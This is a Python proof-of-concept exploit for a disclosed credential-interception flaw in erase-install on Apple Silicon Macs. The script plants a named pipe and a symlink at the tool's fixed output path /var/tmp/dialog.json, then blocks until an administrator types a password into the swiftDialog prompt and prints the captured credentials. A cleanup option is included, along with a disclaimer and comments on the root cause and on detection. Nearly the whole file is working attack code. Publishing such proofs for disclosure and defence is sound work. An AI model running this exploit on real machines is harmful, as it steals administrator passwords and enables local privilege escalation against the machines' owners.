#!/usr/bin/env python3
"""
CVE-2025-70342: Credential Interception in erase-install
erase-install <= v40.4 writes swiftDialog credential output to the
hardcoded path /var/tmp/dialog.json. On Apple Silicon Macs, admin
credentials entered during erase/reinstall are written to this
predictable location in a world-writable directory.
A local unprivileged attacker creates a named pipe (FIFO) and symlink
at the target path to intercept credentials in real time.
Prerequisites:
- Apple Silicon Mac (password prompt only happens on arm64)
- Any local user account (no special privileges)
Usage:
python3 poc.py # Create FIFO + symlink, wait for creds
python3 poc.py --cleanup
Attack:
1. Run this script (creates FIFO + symlink, blocks waiting)
2. Admin runs: sudo erase-install.sh --erase
3. Admin enters password in swiftDialog prompt
4. Password flows through FIFO, printed to stdout
Disclaimer:
For educational and authorized security testing only.
Only use on systems you own or have explicit permission to test.
"""
import argparse
import os
# Fixed path that the affected erase-install releases write the swiftDialog
# output to (see module docstring). It sits in a world-writable directory and
# is predictable, which is the root cause being demonstrated.
DIALOG_OUTPUT = "/var/tmp/dialog.json"
# Where this PoC places its named pipe; DIALOG_OUTPUT is made a symlink to it.
FIFO_PATH = "/tmp/.dialog-fifo"
def _remove_if_present(path):
    """Unlink *path* when os.path.exists() reports it (exists() resolves symlinks)."""
    if os.path.exists(path):
        os.unlink(path)


def watch():
    """Stage a FIFO behind DIALOG_OUTPUT and block until something is written to it.

    Sequence (unchanged from the original PoC): any existing entry at
    FIFO_PATH is removed and a FIFO created there, any existing entry at
    DIALOG_OUTPUT is removed and replaced by a symlink to the FIFO, then
    the FIFO is opened for reading, which blocks until a writer opens it.
    Whatever the writer sends is printed to stdout.

    Defensive note: the weakness shown here is on the writer's side -- a
    secret is written to a fixed, attacker-predictable path in a
    world-writable directory without refusing to follow a symlink. The fix
    belongs there (private, unpredictable output location; open without
    following symlinks), and the artefacts this function leaves behind --
    a FIFO under /tmp and a symlink at DIALOG_OUTPUT pointing to it -- are
    what a detection rule for this issue would look for.
    """
    # The original checks and removes in exactly this order: the FIFO must
    # exist again before DIALOG_OUTPUT is examined, because exists() on a
    # symlink follows it.
    _remove_if_present(FIFO_PATH)
    os.mkfifo(FIFO_PATH)
    _remove_if_present(DIALOG_OUTPUT)
    os.symlink(FIFO_PATH, DIALOG_OUTPUT)

    print(f"[+] FIFO: {FIFO_PATH}")
    print(f"[+] Symlink: {DIALOG_OUTPUT} -> {FIFO_PATH}")
    print("[*] Waiting for credentials...")

    # Opening a FIFO for reading blocks until a writer appears; read()
    # returns once the writer closes its end.
    with open(FIFO_PATH) as pipe:
        captured = pipe.read()
    print("[+] Captured:", captured, sep="\n")
def cleanup():
    """Remove the PoC artefacts: the symlink at DIALOG_OUTPUT and the FIFO at FIFO_PATH.

    DIALOG_OUTPUT is removed only when it is a symlink, so a genuine
    regular file left there by the real consumer is not deleted; FIFO_PATH
    is removed whenever os.path.exists() reports it. Each removal is
    reported on stdout.
    """
    # (path, predicate deciding whether it is ours to remove)
    targets = (
        (DIALOG_OUTPUT, os.path.islink),
        (FIFO_PATH, os.path.exists),
    )
    for path, present in targets:
        if present(path):
            os.unlink(path)
            print(f"[+] Removed: {path}")
def main():
    """Parse the command line and run either cleanup() (--cleanup) or watch()."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-70342: erase-install credential interception PoC"
    )
    parser.add_argument(
        "--cleanup",
        action="store_true",
        help="Remove FIFO and symlink",
    )
    options = parser.parse_args()
    # --cleanup tears the artefacts down; the default action stages them
    # and blocks waiting for the writer.
    action = cleanup if options.cleanup else watch
    action()
# Script entry point; importing the module defines the functions without
# creating any files.
if __name__ == "__main__":
    main()